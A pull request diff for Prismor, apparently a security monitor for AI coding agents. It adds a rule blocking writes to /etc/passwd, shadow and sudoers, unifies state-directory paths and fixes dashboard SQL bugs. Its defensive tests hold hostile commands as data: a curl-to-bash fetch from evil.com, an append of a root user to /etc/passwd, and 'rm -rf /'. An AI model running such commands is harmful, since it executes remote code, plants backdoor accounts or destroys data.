### PR TITLE
fix: block /etc auth-file writes, unify PRISMOR_HOME resolution, fix dashboard SQL bugs

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -10,6 +10,7 @@
 
 - Dashboard "Findings" tab (`/api/findings`) always returned zero results — the query correlated an outer column inside a subquery's `OFFSET` clause, which SQLite rejects (`no such column`), and the exception was silently swallowed. Rewritten using a `ROW_NUMBER()` join instead of the unsupported correlated `OFFSET`. (#129)
 - Dashboard "Events" tab (`/api/events`) showed every event in a session as `verdict: "blocked"`/`severity: "critical"` if the session contained *any* finding, even fully-allowed actions — verdict/severity are now resolved per event instead of per session. (#130)
+- `write_supply_chain_event()` never set `event_index` on the findings it recorded, so a blocked `supplychain npm install`/`pip install`/etc. showed as `verdict: "allowed"` in the dashboard's Events tab (its finding could never resolve back to its own event). (#134)
 - `prismor policy validate` crashed with an unhandled Python traceback on malformed YAML instead of reporting a clean validation error. (#128)
 - `docs/cli-reference.md` no longer lists `workspace show` / `exempt status` as subcommands — neither exists (`workspace` with no argument shows status; `exempt` only has `request`). (#132)
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,5 +1,18 @@
 ## [Unreleased]
 
+### Fixed (security)
+
+- **Direct writes to `/etc/passwd`, `/etc/shadow`, and `/etc/sudoers` are now blocked.** The `path-traversal` rule flagged reads of these paths but never `file_write`, and no other rule covered writes — a `Write`/`Edit`-style tool call (or any SDK adapter call) targeting them passed silently in enforce mode. New `auth-file-write` rule (CRITICAL/block) covers both the shell-redirect and direct-path-write forms. (#127)
+- **`PRISMOR_HOME` is now honored consistently across subsystems.** IAM, canary, and named-agent global config all hardcoded `Path.home()` regardless of `$PRISMOR_HOME`. More importantly, `store.py` had its own duplicate `_secrets_dir()` (missing the `$PRISMOR_HOME` fallback tier that cloak's `secrets_dir()` has — used by the session-store's own secret-scrubbing safety net) and duplicate `get_enrollment()` (no override at all, used by the dashboard) that disagreed with the versions used elsewhere in the CLI. All now resolve through a single `prismor_home()` helper. (#131)
+- **`uninstall-hooks --agent claude`/`all` now announces when it also removes cloaking hooks.** This was already happening silently (cloak hooks share `.claude/settings.json` with the runtime-monitor hooks and get cleaned up as a side effect) with no indication that secret protection had been disabled; it's now called out explicitly in the command output, `--help`, and the CLI reference. (#126)
+
+### Fixed
+
+- Dashboard "Findings" tab (`/api/findings`) always returned zero results — the query correlated an outer column inside a subquery's `OFFSET` clause, which SQLite rejects (`no such column`), and the exception was silently swallowed. Rewritten using a `ROW_NUMBER()` join instead of the unsupported correlated `OFFSET`. (#129)
+- Dashboard "Events" tab (`/api/events`) showed every event in a session as `verdict: "blocked"`/`severity: "critical"` if the session contained *any* finding, even fully-allowed actions — verdict/severity are now resolved per event instead of per session. (#130)
+- `prismor policy validate` crashed with an unhandled Python traceback on malformed YAML instead of reporting a clean validation error. (#128)
+- `docs/cli-reference.md` no longer lists `workspace show` / `exempt status` as subcommands — neither exists (`workspace` with no argument shows status; `exempt` only has `request`). (#132)
+
 ## [1.15.1] — 2026-07-04
 
 ### Fixed

--- a/docs/cli-reference.md
+++ b/docs/cli-reference.md
@@ -92,7 +92,7 @@ prismor
 |---|---|---|
 | `prismor setup [DIR]` | `--non-interactive`, `--mode`, `--agents`, `--cloak/--no-cloak` | Interactive wizard (or scripted with flags / `PRISMOR_MODE`, `PRISMOR_CLOAK` env vars). Picks mode, toggles rules, selects agents, enables cloaking. |
 | `prismor install-hooks` | `--agent <name\|all>` (required), `--mode <observe\|enforce>`, `--scope <project\|user>` | Writes hook config for the chosen agent so Prismor sees tool calls. Without hooks, nothing is monitored. |
-| `prismor uninstall-hooks` | `--agent <name\|all>`, `--scope` | Removes Prismor hooks for an agent. Clean rollback. |
+| `prismor uninstall-hooks` | `--agent <name\|all>`, `--scope` | Removes Prismor hooks for an agent. For `claude`/`all`, this also removes cloaking hooks (`prismor cloak install`) — secrets are no longer protected at the tool boundary until you reinstall with `prismor cloak install`. |
 | `prismor status` | `--workspace`, `--all`, `--days N` | Health check: hooks, mode, cloak state, latest session, and the single next action. Run this first every session. `--all` shows every registered workspace. |
 | `prismor update` | `--check` | Check for (or install) a newer prismor release. |
 | `prismor info` | `--workspace` | _Deprecated_ alias of `status`. |
@@ -201,8 +201,8 @@ Deep dive: [Learning](learning.md).
 |---|---|---|
 | `prismor enroll <token>` | `--label`, `--api-base` | Exchange a single-use org token (minted in the dashboard) for this machine's device identity; pulls the signed org policy. |
 | `prismor enroll-status` | — | Show enrollment state, device label, and the applied policy version. |
-| `prismor workspace <show\|managed\|personal>` | — | Show or set whether this workspace is org-managed (org policy + telemetry) or personal (local-only). Org-claimed repos can't be downgraded. |
-| `prismor exempt <request\|status>` | `--reason` | Ask an org admin to relax specific non-floor rules for this repo; served back in the signed policy. |
+| `prismor workspace [managed\|personal\|auto]` | — | With no argument, shows whether this workspace is org-managed (org policy + telemetry) or personal (local-only). Pass `managed`/`personal`/`auto` to set it. Org-claimed repos can't be downgraded. |
+| `prismor exempt request` | `--reason` | Ask an org admin to relax specific non-floor rules for this repo; served back in the signed policy. |
 | `prismor logout` | — | Un-enroll: removes the device identity and cached remote policy. Local protection stays on. |
 
 Deep dive: [Connecting to the platform](connecting-to-the-platform.md) · [Policy layers & exemptions](policy-layers-and-exemptions.md).

--- a/prismor/runtime/agents.py
+++ b/prismor/runtime/agents.py
@@ -32,7 +32,12 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any, Dict, List, Optional
 
-_GLOBAL_AGENTS_PATH = Path.home() / ".prismor" / "agents.yaml"
+def _global_agents_path() -> Path:
+    """Global agents.yaml path, honoring $PRISMOR_HOME (see PrismorSec/prismor#131)."""
+    from prismor.runtime.store import prismor_home
+    return prismor_home() / "agents.yaml"
+
+
 _PROJECT_AGENTS_FILE = "agents.yaml"
 
 # Module-level seen-set: throttle record_seen() so we only update the YAML
@@ -69,11 +74,12 @@ def _mtime(path: Path) -> float:
 
 def load_agents_config(workspace: Optional[Path] = None) -> Dict[str, Any]:
     """Load agents config, project overrides global. (path+mtime)-memoized."""
+    global_path = _global_agents_path()
     project_path = (
         workspace / ".prismor" / _PROJECT_AGENTS_FILE if workspace else None
     )
     cache_key = (
-        str(_GLOBAL_AGENTS_PATH), _mtime(_GLOBAL_AGENTS_PATH),
+        str(global_path), _mtime(global_path),
         str(project_path) if project_path else "",
         _mtime(project_path) if project_path else -1.0,
     )
@@ -82,7 +88,7 @@ def load_agents_config(workspace: Optional[Path] = None) -> Dict[str, Any]:
         return cached
 
     config: Dict[str, Any] = {}
-    global_cfg = _load_yaml(_GLOBAL_AGENTS_PATH)
+    global_cfg = _load_yaml(global_path)
     if global_cfg:
         config.update(global_cfg)
     if project_path is not None:

--- a/prismor/runtime/canary.py
+++ b/prismor/runtime/canary.py
@@ -9,7 +9,8 @@ Unlike the `secret-access` rule which flags reads of sensitive-named files,
 canarytokens trigger even when the file name looks mundane — the agent
 has to actually OPEN the file to hit the marker.
 
-Registered canaries live in `$HOME/.prismor/canaries.json`. Each entry:
+Registered canaries live in `$PRISMOR_HOME/canaries.json` (default
+`$HOME/.prismor/canaries.json`). Each entry:
   { "id": "<uuid>", "path": "<file>", "type": "aws|ssh|env|generic",
     "marker": "<random-string>", "webhook": "<optional-url>",
     "created": "<iso-timestamp>" }
@@ -27,8 +28,13 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any, Dict, List, Optional
 
-CANARY_REGISTRY = Path.home() / ".prismor" / "canaries.json"
 MARKER_PREFIX = "PRISMOR-CANARY-"
+
+
+def _canary_registry_path() -> Path:
+    """Canary registry path, honoring $PRISMOR_HOME (see PrismorSec/prismor#131)."""
+    from prismor.runtime.store import prismor_home
+    return prismor_home() / "canaries.json"
 
 
 # ── Templates ──────────────────────────────────────────────────────────────
@@ -71,20 +77,22 @@ def _new_marker() -> str:
 # ── Registry ───────────────────────────────────────────────────────────────
 
 def _load_registry() -> List[Dict[str, Any]]:
-    if not CANARY_REGISTRY.exists():
+    registry = _canary_registry_path()
+    if not registry.exists():
         return []
     try:
-        return json.loads(CANARY_REGISTRY.read_text(encoding="utf-8"))
+        return json.loads(registry.read_text(encoding="utf-8"))
     except (json.JSONDecodeError, OSError):
         return []
 
 
 def _save_registry(entries: List[Dict[str, Any]]) -> None:
-    CANARY_REGISTRY.parent.mkdir(parents=True, exist_ok=True)
-    CANARY_REGISTRY.write_text(json.dumps(entries, indent=2), encoding="utf-8")
+    registry = _canary_registry_path()
+    registry.parent.mkdir(parents=True, exist_ok=True)
+    registry.write_text(json.dumps(entries, indent=2), encoding="utf-8")
     # Registry contains markers that bypass detection if leaked — restrict.
     try:
-        os.chmod(CANARY_REGISTRY, 0o600)
+        os.chmod(registry, 0o600)
     except OSError:
         pass
 

--- a/prismor/runtime/cli.py
+++ b/prismor/runtime/cli.py
@@ -843,6 +843,11 @@ def main(argv: Optional[List[str]] = None) -> None:
         for item in results:
             if item["removed"]:
                 print(f"Removed {item['agent']} hooks from {item['configPath']}")
+                if item.get("cloakRemoved"):
+                    print(
+                        "  Also removed cloaking hooks — secrets are no longer protected "
+                        "at the tool boundary. Re-enable with: prismor cloak install"
+                    )
             else:
                 print(f"No Prismor hooks found for {item['agent']} at {item['configPath']}")
         return
@@ -1943,7 +1948,14 @@ def build_parser() -> argparse.ArgumentParser:
     install_parser.add_argument("--mode", choices=["observe", "enforce"], default="observe", help="observe=log only, enforce=block dangerous actions")
 
     # ── uninstall-hooks ────────────────────────────────────────────────
-    uninstall_parser = subparsers.add_parser("uninstall-hooks", help="Remove IDE hooks")
+    uninstall_parser = subparsers.add_parser(
+        "uninstall-hooks",
+        help="Remove IDE hooks",
+        description="Remove Prismor runtime-monitor hooks for an agent. For --agent claude "
+        "(or all), this also removes cloaking hooks installed by `prismor cloak install` — "
+        "secrets are no longer protected at the tool boundary until you re-run "
+        "`prismor cloak install`.",
+    )
     uninstall_parser.add_argument("--workspace", help="Workspace path")
     uninstall_parser.add_argument("--agent", choices=["claude", "cursor", "windsurf", "openclaw", "hermes", "codex", "copilot", "all"], required=True, help="Which agent/IDE")
     uninstall_parser.add_argument("--scope", choices=["project", "user"], default="project", help="Hook scope")

--- a/prismor/runtime/default_policy.yaml
+++ b/prismor/runtime/default_policy.yaml
@@ -654,6 +654,24 @@ rules:
       - '(^|\n)/usr/lib/systemd/system/'
     action: warn
 
+  # ── CRITICAL: Direct writes to core auth files ─────────────────────
+  # path-traversal (above) flags READS of these paths but only for
+  # shell/file_read events. A file_write straight to /etc/passwd,
+  # /etc/shadow, or /etc/sudoers is a full system compromise and had no
+  # coverage at all — see PrismorSec/prismor#127.
+  - id: auth-file-write
+    severity: CRITICAL
+    category: privilege_escalation
+    title: Blocks direct writes to /etc/passwd, /etc/shadow, /etc/sudoers
+    event_types: [shell, file_write]
+    fields: [command, path]
+    patterns:
+      - '(^|\n)/etc/passwd(\s|$)'
+      - '(^|\n)/etc/shadow(\s|$)'
+      - '(^|\n)/etc/sudoers(\.d/[^\n]*)?(\s|$)'
+      - '>>?\s*/etc/(passwd|shadow|sudoers)\b'
+    action: block
+
   # ── HIGH: Persistence — cron jobs via filesystem ──────────────────
   # Paths anchored on `(^|\n)` because _resolve_path may prepend the
   # original path and append the resolved one on a new line.

--- a/prismor/runtime/hooks.py
+++ b/prismor/runtime/hooks.py
@@ -92,18 +92,27 @@ def uninstall_hooks(*, repo_root: Path, workspace: Path, agent: str, scope: str)
         # Claude Code also installs separate cloaking hooks (decloak.sh,
         # recloak-mcp.sh, userprompt-guard.sh). The detection-hook strip
         # above only removes entries that reference cli.py, so cloaking
-        # stays behind unless we explicitly uninstall it too.
+        # stays behind unless we explicitly uninstall it too. Tracked
+        # separately (cloak_removed) so the CLI can call this out — see
+        # PrismorSec/prismor#126.
+        cloak_removed = False
         if current_agent == "claude":
             try:
                 from prismor.runtime.cloaking import uninstall as cloak_uninstall
                 cloak_result = cloak_uninstall(workspace=workspace, scope=scope)
                 if cloak_result.get("removed"):
                     removed = True
+                    cloak_removed = True
             except Exception:
                 # Cloaking is optional — swallow any error so detection-hook
                 # removal still reports cleanly.
                 pass
-        results.append({"agent": current_agent, "configPath": str(config_path), "removed": removed})
+        results.append({
+            "agent": current_agent,
+            "configPath": str(config_path),
+            "removed": removed,
+            "cloakRemoved": cloak_removed,
+        })
     return results
 
 

--- a/prismor/runtime/iam.py
+++ b/prismor/runtime/iam.py
@@ -38,7 +38,12 @@ import sys
 from pathlib import Path
 from typing import Any, Dict, List, Optional
 
-_GLOBAL_IAM_PATH = Path.home() / ".prismor" / "iam.yaml"
+def _global_iam_path() -> Path:
+    """Global iam.yaml path, honoring $PRISMOR_HOME (see PrismorSec/prismor#131)."""
+    from prismor.runtime.store import prismor_home
+    return prismor_home() / "iam.yaml"
+
+
 _PROJECT_IAM_FILENAME = "iam.yaml"
 
 _STARTER_CONFIG = """\
@@ -111,11 +116,12 @@ def load_iam_config(workspace: Optional[Path] = None) -> Dict[str, Any]:
     Memoized on the (path, mtime) of both config files; a change to either
     file invalidates the cache automatically on the next call.
     """
+    global_path = _global_iam_path()
     project_path = (
         workspace / ".prismor" / _PROJECT_IAM_FILENAME if workspace else None
     )
     cache_key = (
-        str(_GLOBAL_IAM_PATH), _mtime(_GLOBAL_IAM_PATH),
+        str(global_path), _mtime(global_path),
         str(project_path) if project_path else "",
         _mtime(project_path) if project_path else -1.0,
     )
@@ -125,7 +131,7 @@ def load_iam_config(workspace: Optional[Path] = None) -> Dict[str, Any]:
 
     config: Dict[str, Any] = {}
 
-    global_cfg = _load_yaml(_GLOBAL_IAM_PATH)
+    global_cfg = _load_yaml(global_path)
     if global_cfg:
         config.update(global_cfg)
 
@@ -291,8 +297,8 @@ def format_iam_profile_box(agent_id: str, profile: Dict[str, Any]) -> str:
 
 
 def init_global_iam() -> Path:
-    """Write a starter iam.yaml to ~/.prismor/iam.yaml and return its path."""
-    path = _GLOBAL_IAM_PATH
+    """Write a starter iam.yaml to $PRISMOR_HOME/iam.yaml (default ~/.prismor) and return its path."""
+    path = _global_iam_path()
     path.parent.mkdir(parents=True, exist_ok=True)
     path.write_text(_STARTER_CONFIG, encoding="utf-8")
     return path

--- a/prismor/runtime/policy_engine.py
+++ b/prismor/runtime/policy_engine.py
@@ -1746,9 +1746,14 @@ def _load_yaml(path: Path) -> Optional[Dict[str, Any]]:
 def validate_policy(path: Path) -> List[str]:
     """Validate a policy YAML file. Returns a list of error messages (empty = valid)."""
     errors: List[str] = []
-    raw = _load_yaml(path)
+    try:
+        raw = _load_yaml(path)
+    except Exception as exc:
+        return [f"Invalid YAML in {path}: {exc}"]
     if raw is None:
         return [f"Cannot read {path}"]
+    if not isinstance(raw, dict):
+        return [f"Invalid policy in {path}: expected a YAML mapping at the top level"]
 
     if "version" not in raw:
         errors.append("Missing required field: version")

--- a/prismor/runtime/store.py
+++ b/prismor/runtime/store.py
@@ -8,6 +8,17 @@ from pathlib import Path
 from typing import Any, Dict, List, Optional
 
 
+def prismor_home() -> Path:
+    """Return Prismor's state directory, honoring $PRISMOR_HOME (default ~/.prismor).
+
+    Single source of truth for the "home" half of state resolution (secrets
+    have their own further override, $PRISMOR_SECRETS_DIR). iam.py, canary.py,
+    and agents.py all import this instead of hardcoding Path.home() — see
+    PrismorSec/prismor#131 for the inconsistency this replaces.
+    """
+    return Path(os.environ.get("PRISMOR_HOME", str(Path.home() / ".prismor")))
+
+
 # ── Re-cloaking: never persist a raw secret value to the audit store ─────────
 #
 # A decloak hook substitutes the real secret into a command for execution. The
@@ -21,7 +32,7 @@ def _secrets_dir() -> Path:
     env = os.environ.get("PRISMOR_SECRETS_DIR")
     if env:
         return Path(env)
-    return Path.home() / ".prismor" / "secrets"
+    return prismor_home() / "secrets"
 
 
 def _load_secret_map() -> List[tuple[str, str]]:
@@ -73,7 +84,7 @@ def _recloak_event(event: Dict[str, Any]) -> Dict[str, Any]:
 # ── Global workspace registry ────────────────────────────────────────────────
 
 def _registry_path() -> Path:
-    return Path.home() / ".prismor" / "workspaces.json"
+    return prismor_home() / "workspaces.json"
 
 
 def register_workspace(workspace: Path) -> None:
@@ -1193,11 +1204,20 @@ def get_findings_page(
                 params.extend([f"%{search.lower()}%"] * 2)
             where = ("WHERE " + " AND ".join(where_clauses)) if where_clauses else ""
             # The triggering event for a finding is identified by event_index
-            # (its 0-based position in the session's event list). Resolve it
-            # via a correlated subquery so we get the actual command/prompt
-            # rather than MAX(...) across the whole session.
+            # (its 0-based position in the session's event list). SQLite does
+            # not support correlating an outer column inside a subquery's
+            # OFFSET clause (`OFFSET COALESCE(f.event_index, 0)` errors with
+            # "no such column: f.event_index" even though the column exists),
+            # so number each session's events with ROW_NUMBER() and join on
+            # equality instead — see PrismorSec/prismor#129.
             for row in conn.execute(
                 f"""
+                WITH numbered_events AS (
+                    SELECT *, ROW_NUMBER() OVER (
+                        PARTITION BY session_id ORDER BY id
+                    ) - 1 AS rn
+                    FROM events
+                )
                 SELECT f.finding_id, f.session_id, f.title, f.category,
                        f.severity, f.evidence, f.event_index, s.agent,
                        te.ts          as trig_ts,
@@ -1210,11 +1230,9 @@ def get_findings_page(
                        s.updated_at    as session_updated
                 FROM findings f
                 JOIN sessions s ON s.session_id = f.session_id
-                LEFT JOIN events te ON te.id = (
-                    SELECT id FROM events
-                    WHERE session_id = f.session_id
-                    ORDER BY id LIMIT 1 OFFSET COALESCE(f.event_index, 0)
-                )
+                LEFT JOIN numbered_events te
+                    ON te.session_id = f.session_id
+                    AND te.rn = COALESCE(f.event_index, 0)
                 {where}
                 ORDER BY COALESCE(te.ts, s.updated_at) DESC
                 LIMIT 5000
@@ -1286,20 +1304,32 @@ def get_events_page(
                 where_clauses.append("s.agent = ?")
                 params.append(agent)
             if verdict == "blocked":
-                where_clauses.append("s.findings_count > 0")
+                where_clauses.append("f.finding_id IS NOT NULL")
             elif verdict == "allowed":
-                where_clauses.append("s.findings_count = 0")
+                where_clauses.append("f.finding_id IS NULL")
             where = ("WHERE " + " AND ".join(where_clauses)) if where_clauses else ""
+            # verdict/severity must reflect THIS event, not the session as a
+            # whole — the previous `s.findings_count > 0` check plus an
+            # unscoped `LEFT JOIN findings ON session_id` marked every event
+            # in a flagged session as "blocked", including ones that were
+            # actually allowed. Number events per session and join findings
+            # on the matching event_index instead — see PrismorSec/prismor#130.
             for row in conn.execute(
                 f"""
+                WITH numbered_events AS (
+                    SELECT *, ROW_NUMBER() OVER (
+                        PARTITION BY session_id ORDER BY id
+                    ) - 1 AS rn
+                    FROM events
+                )
                 SELECT e.ts, e.session_id, s.agent, s.workspace_path,
                        e.type as action_type,
                        e.command_text, e.path_text, e.url_text,
-                       f.severity,
-                       CASE WHEN s.findings_count > 0 THEN 'blocked' ELSE 'allowed' END as verdict
-                FROM events e
+                       f.finding_id, f.severity,
+                       CASE WHEN f.finding_id IS NOT NULL THEN 'blocked' ELSE 'allowed' END as verdict
+                FROM numbered_events e
                 JOIN sessions s ON s.session_id = e.session_id
-                LEFT JOIN findings f ON f.session_id = e.session_id
+                LEFT JOIN findings f ON f.session_id = e.session_id AND f.event_index = e.rn
                 {where}
                 GROUP BY e.id
                 ORDER BY e.ts DESC LIMIT 5000
@@ -1770,7 +1800,7 @@ def get_agents_overview() -> List[Dict[str, Any]]:
 # ── Policy management helpers ─────────────────────────────────────────────────
 
 def _global_policy_path() -> Path:
-    return Path.home() / ".prismor" / "policy.yaml"
+    return prismor_home() / "policy.yaml"
 
 
 def _project_policy_path(workspace: Path) -> Path:
@@ -1779,7 +1809,7 @@ def _project_policy_path(workspace: Path) -> Path:
 
 def get_enrollment() -> Optional[Dict[str, Any]]:
     """Return enterprise enrollment info, or None if unenrolled."""
-    identity = Path.home() / ".prismor" / "identity.json"
+    identity = prismor_home() / "identity.json"
     if not identity.exists():
         return None
     try:
@@ -1797,7 +1827,7 @@ def get_enrollment() -> Optional[Dict[str, Any]]:
 
 
 def _enterprise_remote_cache() -> Optional[str]:
-    cache = Path.home() / ".prismor" / "remote_policy_cache.json"
+    cache = prismor_home() / "remote_policy_cache.json"
     if not cache.exists():
         return None
     try:

--- a/prismor/runtime/store.py
+++ b/prismor/runtime/store.py
@@ -1435,7 +1435,7 @@ def write_supply_chain_event(
                 ),
             )
 
-            for v in verdicts:
+            for event_index, v in enumerate(verdicts):
                 ioc_id = next(
                     (s.id[len("ioc_"):] for s in v.signals if s.id.startswith("ioc_")),
                     None,
@@ -1494,12 +1494,13 @@ def write_supply_chain_event(
                     cursor.execute(
                         """
                         INSERT INTO findings (
-                            finding_id, session_id, severity, category, title, evidence
-                        ) VALUES (?, ?, ?, 'supply_chain_block', ?, ?)
+                            finding_id, session_id, event_index, severity, category, title, evidence
+                        ) VALUES (?, ?, ?, ?, 'supply_chain_block', ?, ?)
                         """,
                         (
                             str(_uuid.uuid4()),
                             session_id,
+                            event_index,
                             severity,
                             title,
                             " | ".join(evidence_parts),

--- a/tests/test_iam.py
+++ b/tests/test_iam.py
@@ -59,15 +59,15 @@ class _IamTestBase(unittest.TestCase):
         iam_mod._CONFIG_CACHE.clear()
         iam_mod._WARNED_UNKNOWN_IDS.clear()
         # Isolate from any real ~/.prismor/iam.yaml on the test machine.
-        self._orig_global = iam_mod._GLOBAL_IAM_PATH
-        iam_mod._GLOBAL_IAM_PATH = self.tmp / "no-such-global-iam.yaml"
+        self._orig_global = iam_mod._global_iam_path
+        iam_mod._global_iam_path = lambda: self.tmp / "no-such-global-iam.yaml"
         proj = self.tmp / ".prismor"
         proj.mkdir(parents=True, exist_ok=True)
         (proj / "iam.yaml").write_text(_PROFILES, encoding="utf-8")
         self._orig_env = os.environ.get("PRISMOR_AGENT_ID")
 
     def tearDown(self):
-        iam_mod._GLOBAL_IAM_PATH = self._orig_global
+        iam_mod._global_iam_path = self._orig_global
         if self._orig_env is None:
             os.environ.pop("PRISMOR_AGENT_ID", None)
         else:
@@ -105,8 +105,9 @@ class TestCheckIamFinding(_IamTestBase):
 
     def test_project_config_overrides_global(self):
         # Global defines readonly-bot as allowing writes; project locks it down.
-        iam_mod._GLOBAL_IAM_PATH = self.tmp / "global.yaml"
-        iam_mod._GLOBAL_IAM_PATH.write_text(
+        global_path = self.tmp / "global.yaml"
+        iam_mod._global_iam_path = lambda: global_path
+        global_path.write_text(
             "agents:\n  readonly-bot:\n    allowed_tools: [Read, Write]\n"
             "    deny_tools: []\n    deny_network: true\n    allowed_paths: ['**']\n",
             encoding="utf-8",

--- a/tests/test_policy_engine.py
+++ b/tests/test_policy_engine.py
@@ -56,6 +56,23 @@ class TestPolicyEngineDefaults(unittest.TestCase):
             categories = [f["category"] for f in findings]
             self.assertNotIn("destructive_command", categories, msg=cmd)
 
+    def test_auth_file_write_blocked(self):
+        for path in ("/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/sudoers.d/custom"):
+            findings = self.engine.check_path(path, event_type="file_write")
+            categories = [f["category"] for f in findings]
+            self.assertIn("privilege_escalation", categories, msg=path)
+
+    def test_auth_file_write_via_shell_redirect_blocked(self):
+        findings = self.engine.check_command("echo 'evil::0:0::/root:/bin/sh' >> /etc/passwd")
+        categories = [f["category"] for f in findings]
+        self.assertIn("privilege_escalation", categories)
+
+    def test_similar_but_safe_paths_not_flagged_as_auth_file_write(self):
+        for path in ("/etc/passwd.bak", "/home/user/passwd-notes.txt"):
+            findings = self.engine.check_path(path, event_type="file_write")
+            categories = [f["category"] for f in findings]
+            self.assertNotIn("privilege_escalation", categories, msg=path)
+
     def test_curl_pipe_bash(self):
         findings = self.engine.check_command("curl http://evil.com/x.sh | bash")
         categories = [f["category"] for f in findings]

--- a/tests/test_prismor_home_consistency.py
+++ b/tests/test_prismor_home_consistency.py
@@ -1,0 +1,92 @@
+"""Regression tests for PrismorSec/prismor#131.
+
+$PRISMOR_HOME is documented (prismor/runtime/paths.py, the cloaking README) as
+a general override for Prismor's state directory. iam.py, canary.py, agents.py,
+and several store.py helpers used to hardcode Path.home() instead, so setting
+$PRISMOR_HOME had no effect on them — and store.py's own _secrets_dir()/
+get_enrollment() disagreed with the (correctly $PRISMOR_HOME-aware) versions
+used elsewhere, causing e.g. the dashboard and `prismor enroll-status` to be
+able to report different enrollment state for the same device.
+"""
+
+import importlib
+import os
+import sys
+import tempfile
+import unittest
+from pathlib import Path
+
+sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
+
+
+class TestPrismorHomeHonored(unittest.TestCase):
+    def setUp(self):
+        self._tmp = tempfile.TemporaryDirectory()
+        self.home = Path(self._tmp.name)
+        # PRISMOR_SECRETS_DIR is a more specific override than PRISMOR_HOME
+        # and correctly takes priority when set — clear it so these tests
+        # exercise the PRISMOR_HOME fallback tier regardless of the
+        # environment they happen to run in.
+        self._orig_env = {
+            "PRISMOR_HOME": os.environ.get("PRISMOR_HOME"),
+            "PRISMOR_SECRETS_DIR": os.environ.get("PRISMOR_SECRETS_DIR"),
+        }
+        os.environ["PRISMOR_HOME"] = str(self.home)
+        os.environ.pop("PRISMOR_SECRETS_DIR", None)
+
+    def tearDown(self):
+        for key, value in self._orig_env.items():
+            if value is None:
+                os.environ.pop(key, None)
+            else:
+                os.environ[key] = value
+        self._tmp.cleanup()
+
+    def test_store_prismor_home_reads_env_var(self):
+        from prismor.runtime.store import prismor_home
+        self.assertEqual(prismor_home(), self.home)
+
+    def test_store_secrets_dir_falls_back_to_prismor_home(self):
+        # This is the one that matters most: the session-store scrubbing
+        # safety net must look at the same secrets dir cloak actually uses.
+        import prismor.runtime.store as store_mod
+        self.assertEqual(store_mod._secrets_dir(), self.home / "secrets")
+
+    def test_iam_global_path_honors_prismor_home(self):
+        import prismor.runtime.iam as iam_mod
+        self.assertEqual(iam_mod._global_iam_path(), self.home / "iam.yaml")
+
+    def test_canary_registry_honors_prismor_home(self):
+        import prismor.runtime.canary as canary_mod
+        self.assertEqual(canary_mod._canary_registry_path(), self.home / "canaries.json")
+
+    def test_agents_global_path_honors_prismor_home(self):
+        import prismor.runtime.agents as agents_mod
+        self.assertEqual(agents_mod._global_agents_path(), self.home / "agents.yaml")
+
+    def test_get_enrollment_agrees_with_enterprise_identity(self):
+        import json
+        identity = {
+            "schema": "prismor.identity.v1",
+            "device_id": "test-device",
+            "org_id": "test-org",
+            "device_key": "fake-key-not-real",
+            "org_name": "Test Org",
+            "label": "test",
+            "api_base": "https://example.invalid",
+        }
+        (self.home / "identity.json").write_text(json.dumps(identity), encoding="utf-8")
+
+        from prismor.runtime.store import get_enrollment
+        from prismor.runtime.enterprise.identity import load_identity
+
+        store_result = get_enrollment()
+        enterprise_result = load_identity()
+        self.assertIsNotNone(store_result)
+        self.assertIsNotNone(enterprise_result)
+        self.assertEqual(store_result["device_id"], enterprise_result["device_id"])
+        self.assertEqual(store_result["org_id"], enterprise_result["org_id"])
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/test_store_dashboard_queries.py
+++ b/tests/test_store_dashboard_queries.py
@@ -1,0 +1,90 @@
+"""Regression tests for the dashboard-facing queries in store.py.
+
+get_findings_page() and get_events_page() had no test coverage at all before
+PrismorSec/prismor#129 and #130 — both queries built session data through the
+real ingest path (save_session_snapshot + analyze_events) and asserted on the
+API-shaped output, the same way `prismor ingest` / the dashboard actually do.
+"""
+
+import os
+import sys
+import tempfile
+import unittest
+from pathlib import Path
+from unittest.mock import patch
+
+sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
+
+from prismor.runtime.cli import analyze_events
+from prismor.runtime.store import (
+    get_events_page,
+    get_findings_page,
+    save_session_snapshot,
+)
+
+
+class TestDashboardQueries(unittest.TestCase):
+    def setUp(self):
+        # Patch list_registered_workspaces rather than calling the real
+        # register_workspace(), which writes to the real global
+        # ~/.prismor/workspaces.json (see PrismorSec/prismor#131) — these
+        # tests must not depend on, or pollute, real machine state.
+        self._tmp = tempfile.TemporaryDirectory()
+        self.workspace = Path(self._tmp.name)
+        patcher = patch("prismor.runtime.store.list_registered_workspaces", return_value=[self.workspace])
+        patcher.start()
+        self.addCleanup(patcher.stop)
+
+        # A mix of one allowed (benign) and one blocked (destructive) shell
+        # event in the same session — the exact shape that exposed both bugs.
+        self.events = [
+            {"type": "shell", "command": "ls -la", "ts": "2026-01-01T00:00:00Z"},
+            {"type": "shell", "command": "rm -rf /", "ts": "2026-01-01T00:00:01Z"},
+        ]
+        analysis = analyze_events(self.events, repo_root=self.workspace, workspace=self.workspace)
+        save_session_snapshot(
+            workspace=self.workspace,
+            session_id="test-session",
+            agent="claude",
+            source="ingest",
+            repo_url=None,
+            events=self.events,
+            analysis=analysis,
+        )
+
+    def tearDown(self):
+        self._tmp.cleanup()
+
+    def test_findings_page_returns_the_stored_finding(self):
+        # Regression for #129: a correlated OFFSET subquery made this always
+        # raise (silently swallowed), so `items`/`total` were always empty.
+        data = get_findings_page()
+        self.assertEqual(data["total"], 1)
+        self.assertEqual(data["items"][0]["category"], "dangerous_command")
+        self.assertIn("rm -rf /", data["items"][0]["trigger"]["detail"])
+
+    def test_events_page_marks_only_the_actual_finding_as_blocked(self):
+        # Regression for #130: verdict/severity were computed from
+        # `s.findings_count > 0` (session-wide), so the benign `ls -la` event
+        # also showed up as "blocked"/"critical" just because the session
+        # contained an unrelated blocked event.
+        data = get_events_page()
+        by_action = {item["action"]: item for item in data["items"]}
+        self.assertEqual(by_action["shell: ls -la"]["verdict"], "allowed")
+        self.assertEqual(by_action["shell: rm -rf /"]["verdict"], "blocked")
+        self.assertEqual(by_action["shell: rm -rf /"]["severity"], "critical")
+
+    def test_events_page_verdict_filter_uses_per_event_match(self):
+        allowed_only = get_events_page(verdict="allowed")
+        actions = [item["action"] for item in allowed_only["items"]]
